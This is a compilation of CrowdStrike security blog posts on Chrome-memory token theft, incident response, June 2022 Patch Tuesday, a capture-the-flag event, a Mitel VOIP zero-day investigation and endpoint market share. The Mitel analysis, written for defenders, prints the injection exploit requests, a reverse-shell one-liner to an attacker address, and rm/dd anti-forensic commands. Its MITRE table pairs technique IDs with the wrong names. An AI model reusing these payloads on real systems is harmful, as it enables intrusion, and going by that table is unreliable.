The research and proof of concept (POC) demonstrate how sensitive information is extracted by a non-elevated process running on the local machine and performs direct access to Chrome’s memory using OpenProcess + ReadProcessMemory APIs.

While existing access to the targeted system is required before leveraging the technique, the extracted sensitive data could be used in subsequent identity-based attacks that can bypass MFA using Oauth cookies or enable lateral movement using extracted credentials. 

The presented technique takes a novel approach in reducing the overhead involved in extracting valid Oauth tokens from web browser memory by reading the Chromium browser’s memory and monitoring for specific login URLs. A snapshot is taken of specific memory buffer regions, both before and after login and authentication. This significantly reduces the amount of memory that needs to be dumped and scanned. Additionally, the technique reduces the amount of time necessary to extract the token and increases the window of opportunity for an attacker before the token expires.

In essence, an attacker could hijack an authenticated user’s browser session, get access to restricted information, and most significantly, bypass MFA without knowing any of the victim’s credentials.

For more detailed technical information on the research and POC, check out the research here.

CrowdStrike Falcon vs. the Memory-Based Data Extraction Technique

Recent research presented by CyberArk Labs to CrowdStrike shows the benefits of cooperation and collaboration in advancing the state of cybersecurity, ultimately helping to build better defense-in-depth capabilities to protect organizations from novel threats, tactics and techniques. Based on the details provided by the research and POC, we were able to build comprehensive Falcon capabilities to protect customers from the newly found technique and other similar ones.

After carefully analyzing the technique presented in the POC, we found there is a vast array of legitimate processes opening a handle to a browser process and using the same open handle access rights to read its memory. See Figure 1 for a snapshot.

Figure 1. Top 10 legitimate processes that use the same method for opening a process and accessing memory data, according to CrowdStrike telemetry (Click to enlarge)

This can present a big challenge to threat hunters as it can be like searching for the proverbial needle in a haystack when looking for malicious processes exhibiting the same behavior. However, there are some subtle differences in how the POC operates that can help us discern between benign and malicious processes. 

From a defense perspective, it’s important to look at the Chrome browser as a credential store, just like Local Security Authority Subsystem Service (LSASS) that’s responsible for enforcing security policy on the machine in terms of handling user authentication, password changes and authentication tokens. Identifying processes that attempt to inject or tamper with LSASS to either create a minidump or attach a debugger can potentially reveal malicious behavior.

The defense of browser credential theft requires similar thinking, both in terms of detection and prevention strategy, as well as a robust identity-based defense. 

When CrowdStrike’s machine learning and behavior-based indicators of attack (IOAs) determine a process is malicious, Falcon will automatically prevent this process from accessing the browser’s memory using this technique. 

Figure 2. CrowdStrike Falcon detection and prevention of the POC attempting to inject the chrome.exe process (Click to enlarge)

As seen in Figure 2, the Falcon platform can immediately detect and prevent the POC from progressing by identifying any suspicious injection techniques on chrome.exe. The process is promptly killed, triggering an alert in the Falcon console.

Running the CyberArk POC through the MITRE ATT&CK® framework mapping reveals tactics and techniques commonly associated with identity-based attacks. The CrowdStrike Falcon platform provides defenders with actionable information on a given technique so that they can immediately take mitigation actions by identifying and blocking the use of stolen credentials and enforcing MFA. By successfully identifying and blocking these chokepoint techniques, defenders can disrupt the adversary and shut down the identity-based attack.

Tactic Description
Execution Native API: T1539
Credential Access Steal Web Session Cookie: T1111
Multi-Factor Authentication Interception: T1106

CrowdStrike Platform Protects from Modern Identity-Based Attacks

Many breaches are now identity-driven. Credential theft, credential hopping, stealing browser cookies for bypassing MFA or credential theft using various tools are just some of the tactics and techniques used in modern identity-based attacks. 

With recent examples of identity-based attacks involving sophisticated adversaries stealing Chrome browser cookies from a user that had already passed an MFA challenge, organizations need a unified approach to security that also enforces Zero Trust.

CrowdStrike’s identity protection capabilities recently shut down MITRE ATT&CK adversaries during the latest adversary emulation, stopping the test before it could even start. Coupled with the Falcon sensor’s comprehensive IOAs and machine learning capabilities, as well as Falcon’s unified cloud-native automated orchestration and threat intelligence, the Falcon platform can equip defenders with the right data at the right time to stop breaches.

Additional Resources

Seven Key Ingredients of Incident Response to Reduce the Time and Cost of Recovery

8 June 2022 at 18:54

When a breach occurs, time is of the essence. The decisions you make about whom to collaborate with and how to respond will determine how much impact the incident is going to have on your business operations.

This blog outlines the seven key ingredients needed for successful incident response, given the spate of widespread ransomware attacks we are witnessing today. This unique approach to incident response is captured in an insightful CrowdStrike Services Incident Response eBook that describes in more detail the value of each ingredient and how it contributes to a substantial reduction in the time it takes to recover from a cyber incident (reducing weeks/months to hours/days) and the cost of recovery, and most importantly the avoidance of business downtime that could have a material impact on an organization’s financials.

These key ingredients are based on many years and thousands of IR engagements defending organizations across the globe against nation-state and eCrime threat actors. We have evolved and honed our incident response technologies, processes and methods to keep pace with these adversaries so we can help you respond to today’s sophisticated, widespread attacks.

With these key ingredients and the value they deliver, we can recover from a widespread attack with speed and precision, with minimal user impact and system downtime, and avoid any potential business outage or interruption for our clients. The key ingredients are:

  1. Immediate Threat Visibility
  2. Active Threat Containment
  3. Accelerated Forensic Analysis
  4. Real Time Response and Recovery
  5. Enterprise Remediation
  6. Threat Hunting and Monitoring
  7. Managed Detection and Response

If you suspect you are the victim of a breach, your traditional security technology and processes may have failed you. The faster you can deploy next-generation security technology, the faster you can stop the breach.

The last thing you want in this situation is to use a traditional recovery approach that suggests the only way to recover from a breach is the full blunt force of wiping systems and applying full system remediation (reimage, rebuild or replace). This approach may have worked for attacks that occur on a handful of systems, but against today’s widespread ransomware attacks that impact hundreds or thousands of endpoints, we need a more intelligence-driven and effective solution — one that provides immediate visibility to the full threat context and enables the real-time surgical removal of attack artifacts with speed and precision.

In effect, the first four ingredients are the key: gain immediate threat visibility, contain the active threat, accelerate the forensic analysis, and recover the endpoints using real-time response. We do this to minimize the percentage of endpoints that require full system remediation. We want to recover the majority of endpoints using real-time response, so we only have to focus on reimaging or rebuilding a much smaller number of systems. For some clients, we are able to recover all of their systems using CrowdStrike Falcon® Real Time Response, enabling them to get back to business faster. 

While we are typically able to recover environments rapidly, we continue to support our clients with threat hunting and monitoring from the Falcon OverWatch™ threat hunting team for the duration of the engagement. Adversaries that gain access to a network look to establish persistence within your environment and are not going to go away easily. The OverWatch team monitors for any recurrences of the initial threat and any hands-on-keyboard activity that the adversary might attempt. At the end of the CrowdStrike Services Incident Response engagement, we want our clients to feel confident they have recovered from the breach and ejected the adversary completely from the network. For those clients that never wish to go through this again, we offer a fully managed detection and response (MDR) solution, Falcon Complete™, which allows customers to continue running the Falcon platform while relying on the expertise of our team to detect threats in 1 minute, investigate in 10 mins and respond inside of 1 hour to prevent breaches from impacting their business.

For more details on our modern intelligence-led approach to rapid response and recovery from today’s widespread security incidents, download our eBook on CrowdStrike Incident Response.

Additional Resources

  • Learn more about how CrowdStrike Breach Services can help you respond to an attack with speed and recover from an incident with surgical precision.
  • Download the complete CrowdStrike Incident Response eBook to learn more about CrowdStrike’s modern approach to rapid response and recovery from today’s widespread security incidents.
  • Get on-demand access to CrowdStrike incident responders, forensic investigators, threat hunters and endpoint recovery specialists with a CrowdStrike Services Retainer.

June 2022 Patch Tuesday: Three Critical CVEs and a Fix for the Follina Vulnerability

16 June 2022 at 18:29

Microsoft has released 55 security patches for its June 2022 Patch Tuesday rollout. Three of the 55 CVEs addressed are rated Critical severity, with CVE-2022-30136 having the highest CVSS score of 9.8. In this blog, the CrowdStrike Falcon Spotlight™ team offers an analysis of this month’s vulnerabilities, as well as insights into the vulnerabilities and patches affecting Microsoft products in the first half of this year. We highlight the CVEs in this month’s update that are most severe and recommend how to prioritize patching. Additionally, we discuss a much-anticipated patch for the Follina vulnerability (CVE-2022-30190). 

Official Fix for Windows MSDT Follina Zero-Day Vulnerability

Microsoft’s June 2022 patch update includes a fix for the widely exploited Windows Microsoft Diagnostic Tool (MSDT) zero-day vulnerability known as Follina. Last month, this Windows zero-day vulnerability was discovered in attacks that executed malicious PowerShell commands via MSDT. When it was first detected, the vulnerability bypassed all security protections, including Microsoft Office’s Protected View, and executed the PowerShell scripts when a user simply opened a Word document. A brief timeline on this vulnerability:

  • On May 27, 2022, a remote code execution vulnerability was reported affecting MSDT
  • The vulnerability, which is classified as a zero-day, can be invoked via weaponized Microsoft Office documents, Rich Text Format (RTF) files, XML files and HTML files
  • The CrowdStrike Falcon® platform protects customers from current Follina exploitation attempts using behavior-based indicators of attack (IOAs)
Rank CVSS Score CVE Description
Critical 7.8 CVE-2022-30190 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

CrowdStrike recommends that you monitor your environment to see if it is affected by this vulnerability and apply the fix offered. 

June 2022 Risk Analysis

The top three attack types — remote code execution (RCE), elevation of privilege and information disclosure — continue to dominate, with denial of service following at almost 6%.

Figure 1. Breakdown of June 2022 Patch Tuesday attack types

The affected product families, however, differ greatly from last month. In May 2022, Developer Tools — including Visual Studio Code, Visual Studio 2019 and 2022, and Microsoft .NET Framework — saw a significant decrease in vulnerabilities patched. Microsoft Windows received the most patches this month, with Extended Security Updates (ESU) following close behind. A single Microsoft Exchange update was also included in this month’s patching list.

Figure 2. Breakdown of June 2022 Patch Tuesday affected product families

Critical Vulnerabilities Affecting LDAP, NFS and Hyper-V

Three vulnerabilities ranked as Critical received patches this month. Affected products are Windows Lightweight Directory Access Protocol (LDAP), Windows Network File System (NFS) and Windows Hyper-V. Let’s review each of these vulnerabilities and how they could affect an organization’s environment. 

CVE-2022-30136: This Windows Network File System remote code execution vulnerability with a CVSS of 9.8 is very similar to CVE-2022-26937, a Network File System (NFS) CVE patched last month. This vulnerability could allow a remote attacker to execute privileged code on affected systems running NFS. On the surface, the only difference between the patches is that this month’s update fixes a flaw in NFSV4.1, whereas the flaws found last month only affected versions NSFV2.0 and NSFV3.0. Enterprises running NFS should prioritize testing and deploying this fix.

CVE-2022-30163: This Windows Hyper-V remote code execution vulnerability with a CVSS of 8.5 could allow a user on a Hyper-V guest to run their code on the underlying Hyper-V host OS. The update doesn’t list the privileges the attacker’s code would run at, but any guest-to-host escape should be taken seriously. Microsoft notes that attack complexity is high since an attacker would need to win a race condition.

CVE-2022-30139: This Windows Lightweight Directory Access Protocol (LDAP) remote code execution vulnerability with a CVSS of 7.5 is one of the seven LDAP vulnerabilities fixed this month. The volume of CVEs in LDAP over the last couple of months could indicate a broad attack surface in the component.

Rank CVSS Score CVE Description
Critical 9.8 CVE-2022-30136 Windows Network File System Remote Code Execution Vulnerability
Critical 8.5 CVE-2022-30163 Windows Hyper-V Remote Code Execution Vulnerability
Critical 7.5 CVE-2022-30139 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

Additional Windows LDAP Remote Code Execution Bugs

There are seven RCE vulnerabilities affecting Windows LDAP patched this month, a decrease from the 10 LDAP patches last month. One is rated as Critical (covered in the previous section), and six are ranked as Important. The most severe of these received a CVSS score of 8.8 but would require the MaxReceiveBuffer LDAP policy to be set to a value higher than the default value.

Rank CVSS Score CVE Description
Important 8.8 CVE-2022-30161 Windows LDAP Remote Code Execution Vulnerability
Important 8.8 CVE-2022-30153 Windows LDAP Remote Code Execution Vulnerability
Important 8.1 CVE-2022-30141 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30143 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30146 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30149 Windows LDAP Remote Code Execution Vulnerability

Two Important Kerberos Vulnerabilities

Two vulnerabilities involving Windows Kerberos and Kerberos AppContainer received CVSS scores of 8.8 and 8.4, respectively, and a rank of Important. Nonetheless, these vulnerabilities are relevant to any organization using the affected products. 

CVE-2022-30164: Kerberos AppContainer security feature bypass vulnerability. If exploited, an attacker could bypass the Kerberos service ticketing feature that performs user access control checks. According to Microsoft, no user interaction is required, and attack complexity is rated Low. For more details, click here.

CVE-2022-30165: Windows Kerberos elevation of privilege vulnerability. Ranked as Important with a CVSS of 8.8, this bug in Kerberos affects servers with both Credential Security Service Provider (CredSSP) and Remote Credential Guard (RCG) installed. An attacker could elevate privileges then spoof the Kerberos logon process when an RCG connection is made via CredSSP. According to Microsoft, no user interaction is required and attack complexity is rated Low. For more details, click here.

Rank CVSS Score CVE Description
Important 8.8 CVE-2022-30165 Windows Kerberos Elevation of Privilege Vulnerability
Important 8.4 CVE-2022-30164 Kerberos AppContainer Security Feature Bypass Vulnerability

Falcon Spotlight provides the visibility SecOps teams need to quickly identify which vulnerabilities are prevalent in your organization’s environment. When it comes to additional detection capabilities, Falcon Spotlight is completely integrated within the CrowdStrike Falcon® platform that offers a host of other capabilities, including the ability to take swift and instantaneous action by isolating potentially compromised hosts from exploited vulnerabilities. Additionally, the Falcon platform mitigates the risk from vulnerabilities that can not be patched rapidly by detecting and automatically preventing exploitation attempts and post-exploitation activity.

H1 2022 Vulnerability Recap

There have been 461 CVEs affecting Microsoft products as of June 14, 2022. While this is markedly lower than the 612 vulnerabilities reported in H1 2021, what has remained consistent is the persistence of adversaries working to take advantage of vulnerabilities across myriad products. Out-of-band (OOB) patching and active exploitation continues to occur (such as Follina and Log4j), meaning a review of Patch Tuesday vulnerabilities should be a key component in your vulnerability management program.

Figure 3. Number of CVEs that Microsoft released each month, January-June 2022

While April saw the greatest number of vulnerabilities patched — it was the only month to exceed 100 in H1 2022 — the quantity of patches in a given month does not correlate with higher risk or indicate a higher rate of exploitation. It also does not signify an increase in eCriminal behavior for a particular product or service. In the latest Verizon Data Breach Investigations (DBIR) Report, vulnerability exploit analysis showed that organizations running a robust vulnerability management program were able to patch or remediate vulnerabilities and had no discernable security issues relating to vulnerabilities. However, organizations that did not regularly review vulnerability within their lifecycle ended up with more incidents, especially around internet-facing hosts. 

What does all this mean for you in 2022? We have a few insights when it comes to maintaining your vulnerability management program:

  • Adversaries are persistent and consistent; they have all the time in the world and will continue to look for access in whatever way possible. Remember, a small amount of access is still access. 
  • Vulnerabilities do not exist in a vacuum; assets, hosts and entities are all connected to each other in an environment, and many of them to the internet as well. It’s increasingly apparent that holistic visibility of all assets and how they relate to each other should be monitored in conjunction with your vulnerability management program. Security hygiene and attack surface visibility can offer valuable insights into how you prioritize and patch vulnerabilities within your environment.
  • Patch Tuesday matters! If any part of your environment uses Microsoft products, or if other vendors conduct patching cycles, it’s important to review the patches released every month and take time to apply fixes or updates to products wherever applicable. 

When It Comes to Vulnerabilities, It’s Not Just About Quantity

Adversaries will never go away. They will use any and every opportunity to take advantage of a flaw, weakness or vulnerability. If you have the big “holes” fixed in your organization’s environment, that’s a great start, but to stay on top of your vulnerability lifecycle program, SecOps staff must regularly maintain the program you’ve defined to determine which vulnerabilities are critical to your environment. Even if a vulnerability has a high CVSS score, that doesn’t necessarily mean it’s critical to your team. Context and prioritization matter, especially given that many SecOps teams have limited time to apply updates and patches.

CrowdStrike recommends relying on solutions that aid in speedy mitigation and remediation when it comes to all vulnerabilities, both in and out of Patch Tuesday cycles. CrowdStrike’s suite of SecOps solutions help provide deep-level context, including insights surrounding more advanced threats. 

For vulnerability management specifically, Falcon Spotlight can help you dynamically rate and prioritize vulnerabilities that matter to your organization, and help you establish workflows to automate those CVEs that need to be scheduled for more regular maintenance. See how Falcon Spotlight operates via its game-changing AI with ExPRT.AI and workflows.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization. 

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article

Additional Resources

Capture the Flag: CrowdStrike Intelligence Adversary Quest 2022

16 June 2022 at 19:04

The Adversary Quest is back! From July 11 through July 25, 2022, the CrowdStrike Intelligence Advanced Research Team invites you to go head-to-head with three unique adversaries during our second annual Adversary Quest. Last year hundreds of Adversary Quest participants battled for the coveted CrowdStrike swag that was awarded to the top 50 high scorers. Now it’s your chance to defeat the adversary and win!

Register now and you will be able to track CATAPULT SPIDER (a ransomware adversary with a weird passion for a specific altcoin), PROTECTIVE PENGUIN (sentient Antarctic wildlife with offensive cybersecurity capabilities) and TABLOID JACKAL (a previously unknown adversary in disagreement with SPACE JACKAL’s preferences for source code indentation).

How to Play

The Adversary Quest will feature one track for each adversary, and each track will consist of four challenges. The tracks may include topics such as binary exploitation, reverse engineering, cryptography and OSINT research. The game is open to individual players (no teams) and designed to be an enjoyable experience for security enthusiasts of all skill levels.

During the game, you will need to find and submit flags that conform to the following format: CS{this_is_an_example}. If your finding doesn’t follow this format, you will need to keep searching. For each finding, you will get points that sum up to a total score.

The game is meant to be enjoyable for everyone, so please don’t attack the game’s infrastructure (e.g., the scoreboard or any service that is not obviously part of a challenge) and don’t share write-ups or spoilers before the game ends. After the game, we would love to see your solutions and write-ups online.

The formal terms of the event are at https://adversary.quest/tos. Like last year, the best players will be awarded some cool swag!

Timeline

  • Register now at https://adversary.quest/register
  • The event begins on July 11, 2022 at 17:00 UTC / 13:00 p.m. EDT / 10:00 a.m. PDT
  • The event ends on July 25, 2022 at 17:00 UTC / 13:00 p.m. EDT / 10:00 a.m. PDT

Contact

Email any questions about the event to [email protected]. We look forward to your participation!

Additional Resources

The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance

23 June 2022 at 16:26
  • CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point. 
  • The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.
  • CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.
  • The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.

Background

CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited. 

The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT) team, this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.

Discovery and Anti-Forensic Techniques

After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally. 

Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor. 

Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:

rm: cannot remove '/cf/swapfile': Operation not permitted
dd: error writing '/tmp/2': No space left on device
10666+0 records in
10665+0 records out
11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s

The messages in the recovered file indicated two things. First, the error for the rm1 command failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile due to it being active, resulting in the error message. 

Second, the threat actor used the dd2 command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition than that storing HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.

Exploit Details

The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.

Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.

Request #1:

1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40

The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure, and then pipe the results of the request locally to sh.3 This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. This vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.

Request #2:

127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -

In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.

The first outbound request returned valid json related to the application to reach the vulnerable section of code.

Outbound request and response #1:

GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}

The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.

Outbound request and response #2:

GET //shoretel/wc2_deploy HTTP/1.1
User-Agent: curl/7.29.0
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1

In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.

Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client will use ssl and netcat will typically be plaintext.

Post-Exploitation Activity

Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.

1.1.256.1 - - [1/Mar/2022:06:36:04 -0500] "POST /vhelp/pdf/pdf_import.php HTTP/1.1" 200 2

The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.

Conclusion

Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements. 

Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.

Endnotes

  1. Linux command to remove files or directories
  2. Linux command to convert and copy files
  3. Linux command to spawn a shell or terminal prompt

Additional Resources

CrowdStrike Tops IDC Worldwide Corporate Endpoint Security Market Shares, 2021

23 June 2022 at 14:44

CrowdStrike is proud to be ranked No. 1 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report (doc #US48580022, May 2022). We are grateful to our customers and partners for helping us achieve this significant milestone, yet its real value goes far beyond the bottom line. Our conviction is that the only way to stop modern adversaries is by using a best-in-class platform that leverages native artificial intelligence (AI), machine learning (ML) and automation to harness the power of high-fidelity data and front-line human expertise. 

Rich telemetry and threat intelligence form the foundation of nearly everything CrowdStrike does. It trains our AI and ML algorithms to make hyper-accurate decisions, gives our threat hunters and incident responders the context they need to root out and contain active attacks, informs intelligent automation across our platform, and empowers SecOps professionals with the visibility to simplify and accelerate detection, investigation and response workflows across their environment.

Unifying AI and Human Expertise to Stop Adversaries

Some AI experts argue that general purpose methods such as search and learning that leverage ever-increasing training sets and computing power are what primarily drive how machines can solve the most complex problems (e.g., beating an expert in the game of Go). You can think of this approach as teaching the algorithm how to think and learn (like a toddler learning how to play the game by watching their friends and then trying over and over until they get it right) rather than putting specific knowledge into it (like the same toddler being told over 200 possible moves and common strategies for gameplay and then left on their own to figure things out). 

Others would argue that simply adding more raw data and computing power isn’t enough, as human knowledge is critical to achieving a specific outcome (and to reducing the carbon footprint from unlimited computing). 

While this debate is sure to continue, let’s examine how CrowdStrike holistically blends both approaches — supervised and unsupervised — to achieve cloud-scale AI that is enriched with human-led expertise to solve one of the hardest challenges in IT: counteracting a malicious human on the other side of the keyboard.

High-Fidelity Data Is the Bedrock of Analytics

Every good decision in cybersecurity starts with good data, which must come from sensors deployed holistically across the enterprise. The more weak signals you can integrate into a strong signal, the better your chances are of finding the attack that matters most, which is one of the core philosophies behind CrowdStrike Falcon XDR. According to the IDC report, we owned “12.6% corporate endpoint security market in 2021,” leapfrogging all other providers and delivering significant year-over-year growth. Our growth means we have evermore sensors in the most critical, highly targeted organizations, resulting in more high-fidelity data for analytics.

By the numbers, CrowdStrike Threat Graph® processes trillions of security events per day from nearly 18,000 customers around the world. One of the secrets of AI, and the Threat Graph itself, is how the value of data compounds over time. The more high quality data you have over an extended time horizon, the faster and more accurate decisions you can make. As we’ve been categorizing indicators of attack (IOAs) and tactics, techniques and procedures (TTPs) for over a decade, chances are we’ve already seen a particular malicious behavior or something like it. This allows us to predict the right response in near real time. Whether the response is a prevention event or investigating, hunting or running forensics across our vast data repository, it results in better prevention rates and faster time to containment for our customers.

AI-powered Analytics Is Key to Stay Ahead of Evolving Adversaries

Of course, raw data isn’t valuable without analytics. As we’ve seen throughout the long history of security information and event management (SIEM) systems, more data can often be overwhelming, requiring vast resources to ingest, store, manage and transform raw telemetry into actionable insights. SIEMs are often referred to as “garbage collectors” for data — garbage data in equals garbage data out.The last thing we need in cybersecurity is more noise. The key is gathering and integrating the right data to fuel analytics, which never means all data.

Across the CrowdStrike Falcon® platform, we employ multiple complementary layers of AI/ML to our rich dataset to deliver accurate results, including our continuously learning malware prevention capabilities on the endpoint that can stop never-before-seen threats before they result in a breach. Additionally, with Falcon XDR, we apply analytics across disparate sources of security telemetry to surface hidden threats that could bypass traditional single-point detection tools. 

Another critical area of focus for analytics is the quality of the security analyst experience. CrowdStrike constantly finds ways to inject analytics into our platform to make the job of detecting, investigating and responding to events simpler and more effective. For instance, no analyst intervention is needed to build the complete visualization of an adversary’s complex attack path, saving hours and greatly reducing mean time to detect/mean time to respond (MTTD/MTTR); think of this like “autocomplete” in your email. 

CrowdStrike will continue to drive new innovations in the Falcon platform to take the hands-on grunt work out of security operations. One such example is the native integration of the CrowdStrike Falcon Fusion security orchestration and automation response (SOAR) solution into Falcon XDR, which allows analysts to focus on responding in a timely manner to the relatively few events that truly matter, the situations where responses can’t be fully automated.

Human-led Expertise Informs AI in a Virtuous Cycle

CrowdStrike is privileged to help our customers prepare, hunt, react to and recover from potential cyberattacks with the world’s best threat hunting and incident response (IR) team. From our fully managed Falcon Complete™ solution to threat hunting and IR, the experts behind these services constantly feed the results of their activities — be it a newly discovered malware family, IOAs or other adversary tactics — into the Threat Graph. CrowdStrike technology then automatically uses what our experts have learned to train our AI/ML models to detect and stop future attacks. The more hunting or frontline engagements we perform, the more tacit knowledge our platform retains. As our agents and services continue to be deployed across more enterprises and endpoints, we gain more visibility and discover and contain more threats, which turns into a flywheel that keeps CrowdStrike ahead of the most advanced adversaries.

Turning On the Flywheel to Stop Breaches

